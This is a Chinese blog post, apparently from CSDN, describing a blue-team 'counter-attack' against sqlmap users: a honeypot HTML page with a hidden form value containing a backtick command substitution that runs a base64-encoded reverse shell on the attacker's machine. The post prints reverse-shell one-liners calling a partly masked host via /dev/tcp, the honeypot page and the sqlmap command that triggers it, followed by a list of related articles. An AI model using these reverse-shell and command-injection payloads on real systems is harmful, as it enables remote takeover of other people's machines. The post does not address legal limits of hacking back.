溯源反制-SQLMAP反制

最新推荐文章于 2024-06-16 11:00:16 发布
最新推荐文章于 2024-06-16 11:00:16 发布
阅读量708 收藏 2
点赞数
分类专栏: 溯源反制 文章标签: linux bash 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62172162/article/details/130368499
版权

#溯源反制-SQL注入工具-SQLMAP
复现环境:
蓝队:Linux Web
红队:Linux sqlmap
蓝队提前构造注入页面诱使红队进行sqlmap注入拿到红队机器权限
原理:
命令管道符:ping "`dir`"
构造注入点页面固定注入参数值,等待攻击者进行注入
sqlmap -u "http://47.94.xxx.xxx/test.html?id=aaa&b=`dir`"
sqlmap -u "http://47.94.xxx.xxx/test.html?id=aaa&b=`exec /bin/sh 0</dev/tcp/47.94.xxx.xxx/2333 1>&0 2>&0`"
1、测试反弹编码:
bash -i >& /dev/tcp/47.94.xxx.xxx/2333 0>&1
echo YmxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxMgMD4mMQ== | base64 -d|bash -i
2、蓝队构造页面test.php注入页面固定参数值:
<html>
<head>
<meta charset="utf-8">
<title> A sqlmap honeypot demo</title>
</head>
<body>
<input>search the user</input> <!--创建一个空白表单-->
<form action="username.html" method="post" enctype="text/plain">
<!--创建一个隐藏的表单-->
<input type='hidden' name='name' value="xiaodi&id=45273434&query=shell`echo YmFzaxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxD4mMQ== | base64 -d|bash -i`&port=6379"/>
<!--创建一个按钮,提交表单内容-->
<input type="submit" value='提交'>
</form>
</body>
</html>
3、红队攻击者进行注入测试:
sqlmap -u "http://xx.xx.xx.xx/test.php" --data "name=asho&id=45273434&query=shell`echo YmFzcxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxLzIzMzMgMD4mMQ== | base64 -d|bash -i`&port=6379"

加油上分版
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安全红蓝对抗反制(反捕、画像)
墨痕诉清风的博客
03-09 3657
1.蜜罐 蜜罐可以理解成互联网上的一台主机,它的作用是诱骗攻击者去对自己进行攻击,然后记录攻击者的攻击细节并生成对应的攻击者画像,是当前的一种比较主流的入侵检测系统也是一种主动防御系统。 1.1 放置高交互蜜罐 放置高交互蜜罐,例如一个邮箱服务类型的蜜罐,攻击者有可能会进行邮箱注册,这样子攻击者就主动向我们留下了自己的身份信息。 1.2 放置多个容易被发现的蜜罐 放置多个攻击者可以轻而易举发现的蜜罐,攻击者就会知道自己所在的环境是被蜜罐所包围的,有可能就会放弃进行大范围攻击,变相保护了蜜罐背后的真
溯源系列:溯源(七)之利用AntSword RCE进行溯源反制黑客
weixin_54626591的博客
01-05 838
溯源(七)之利用AntSword RCE进行溯源反制黑客
2021HW参考 _ 溯源反制终极手册(精选版).pdf
03-30
适合于2021参加hw的人。
sqlmap --os-shell反制小思路
墨痕诉清风的博客
12-15 883
前言 之前有看到goby反制和松鼠A师傅蚁剑反制的文章,再想到之前写过sqlmap的shell免杀,觉得思路其实差不多,就写一篇sqlmap反制吧。 sqlmap流量分析 (其实可以通过分析解密后sqlmap内置的backdoor后门文件(文章链接)) 具体sqlmap的攻击流程差不多是这样: 1.测试链接是否能够访问 2.判断操作系统版本 3.传递一个数组,尝试爆绝对路径 4.指定上传路径 5.使用lines terminated by 写入一个php文件,该php文件可以进...
蓝队 | 溯源反制 | 溯源技巧
最新发布
哦 卷!
06-16 879
通常情况下,接到溯源任务时,获得的信息如下其中攻击 IP攻击类型恶意文件攻击详情是溯源入手的点。通过攻击类型分析攻击详情的请求包,看有没有攻击者特征,通过获取到的 IP地址进行威胁情报查询来判断所用的 IP 具体是代理 IP 还是真实IP地址。端口扫描命令执行爬虫恶意文件DGA 域名。
溯源反制
m0_65096687的博客
06-19 983
这里要说一下,让我们做蜜罐时候,一定要做的像内网的真实主机,不能让对方一眼识别。比如说网卡啊,虚拟机可以用别人测试的游戏虚拟机,相关文件,敏感文件,各种服务。进行取证,取证的主要是对方的office文件,各种第三方社交软件,比如说微信有个缓存文件db后缀结尾的,里面有聊天记录,拿去破解一下。比如说我在日志里找到了对应的攻击者IP,那么我们就要对ip进行识别他的网络资产,比如站长之家识别一下,查看一下有无域名,对域名进行反查一下,看是否可以搜索到攻击者相关信息。溯源的关键在于取证,获取到攻击机的相关信息。
蓝队溯源反制
zhangge3663的博客
05-06 3765
本文简单写下红蓝对抗过程中蓝队的一些溯源反制方法。 一、蜜罐反制 (1)商用型 近年来越来越多的厂商选择部署商用蜜罐来诱导攻击者,衡量蜜罐好坏的关键因素为诱捕能力,即为诱惑捕捉能力。 利用蜜罐可以做到:获取攻击者的P(真实IP,代理IP等)、ID、操作系统、设备信息等,也可通过诱饵进行钓鱼反制。 蜜罐常见形式可以直观的分为web页面型,命令行型,windows型等。 web页面例如weblogic、phpmyadmin、crm等,攻击者可进行弱口令登陆,暴力破解,历史漏洞,后台shell等,蜜罐页面中会
红队系列-溯源与应急反制专题
aming小老弟
11-09 410
日志分析、流量特征分析、内存马。
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
热门推荐
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
浅谈溯源反制与防溯源
weixin_48421613的博客
02-06 4605
溯源反制与防溯源的小谈
溯源(七)之利用AntSword RCE进行溯源反制黑客
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-03 1318
在之前文章中我们学习了如何通过Web日志,系统日志,安全设备去获取攻击源,然后再通过获取的攻击源的信息再去寻找攻击者的身份,这些方式都是被动的去寻找攻击者的身份 但这些方法不是万能的,实际入侵中,攻击者都会挂一个代理,或者是对自己的流量进行一个加密,所以如果攻击者在攻击过程中进行了以上的行为,那我们通过Web日志或者安全设备得到的攻击源很大概率上都不是真实的 所以,我们要化被动为主动,去主动获取攻击者的身份,主动去寻找攻击者是一个什么样的思路呢?
应急溯源反制
2301_76786857的博客
12-29 860
应急溯源反制
溯源反制思路整合
风炫的博客
07-27 2422
溯源反制思路整合 文章目录溯源反制思路整合0x01反制的整体思路0x02 反制具体思路0x0201 反制主机0x0202 反制后门附件0x0203 反制攻击工具0x03 拿下傀儡机之后如何进行源IP的查找0x0301 日志分析01 Web日志分析02 系统日志分析0x0302 进程分析WindowsLinux0x0303 流量分析通用Windowslinux0x0304 服务查询WindowsLInux0x0305 其他技巧通用查询在线登陆者0x04 溯源相关思路根据IP进行溯源根据域名进行溯源根据ID溯源
一文彻底说明白溯源反制以及对抗
xxx
05-28 2689
感觉很多人都对溯源反制这个事情,感觉很神奇。今天就讲一下我所知道的目前的溯源反制的手段,以及技术原理1.ip层面这个维度主要就是对攻击者的ip进行威胁情报查询,微步在线跑一遍,重点关注历史绑定域名、绑定域名的备案等等。或者可以扫一下攻击ip开发的端口等等,可能有一些脆弱服务什么的。2.浏览器层面也就是目前蜜罐主流的手段,2.1 jsonp浏览器层面主要发力点是在JSONP漏洞上,jsonp是早期浏览器对跨域支持不完善,开发人员想到的一种绕过机制。大家都知道在HTML页面中,我a站直接ajax b站,如果没有
【应急响应】战中溯源反制&对抗上线CS&Goby&蚁剑&Sqlmap等安全工具
今天是几号的博客
04-20 1888
CS反制 Goby反制 Antsword反制 AWVS反制 BURP反制 SQLMAP反制 XSS钓鱼 蜜罐反制。前面准备工作都是一气呵成,这里有个一很坑的地方就是使用pip安装Frida module时,一开始安装总是报错(tiemout以及各种问题),然后我不停的换Pytthon版本emmm,最后解决是使用超级管理员权限运行cmd就好了(心中无数个?) ```bash python cve-2022-39197.py beacon.exe http://可访问的WEB:8888/evil.sv
蓝队技巧——溯源反制
carrot11223的博客
02-27 325
一、如果看到后门文件,可以修改后门文件,当对方再使用蚁剑链接的时候,就会将yijian所有的权限交出去,后门文件中可以修改为js代码,效果就是获取攻击者的权限,而攻击者那边会出现连接不上的问题,但如果攻击者经验不足,可能单纯以为是连接问题,忽视了已经将自己的权限交出去。四、反制server,连接对方的cs服务器,爆破密码,获得攻击者cs权限,所以攻击者的cs密码应该设置复杂一点,放置被爆破。地址:https://github.com/its-arun/CVE-2022-39197。
可恶!没想到sqlmap也背叛了脚本小子
jennycisp的博客
12-11 293
之前有群友丢了一个案例,提问sqlmap是否有反制漏洞,群里有大哥回复有命令执行,由于自己对这个没有了解,但sqlmap嘛又是本脚本小子的常用工具,sql注入没有sqlmap怎么测嘛,那么处于对自己的保护赶紧随着大佬的提醒去看了看文章。反引号:在linux中,反引号中的内容一般是一行或多行命令,当这些命令被反引号引着,命令执行结果就会以字符串的形式被保留下来。无引号:如何是连续的符号可以不加引号,但是如果有空格就有歧义,最好使用双引号。双引号:双引号里面的特殊字符是可以被识别的,是弱引用。
什么是SQL注入漏洞-SQLmap注入
05-21
SQL注入漏洞是一种常见的Web应用程序安全漏洞,攻击者通过在输入数据中插入恶意的SQL代码,使应用程序接受并执行其代码,从而获得不应该被揭示的敏感信息。SQLmap是一种流行的自动化工具,用于检测和利用Web应用程序中的SQL注入漏洞。它通过发送各种恶意有效载荷来测试目标网站是否存在SQL注入漏洞,并自动获取目标数据库的信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值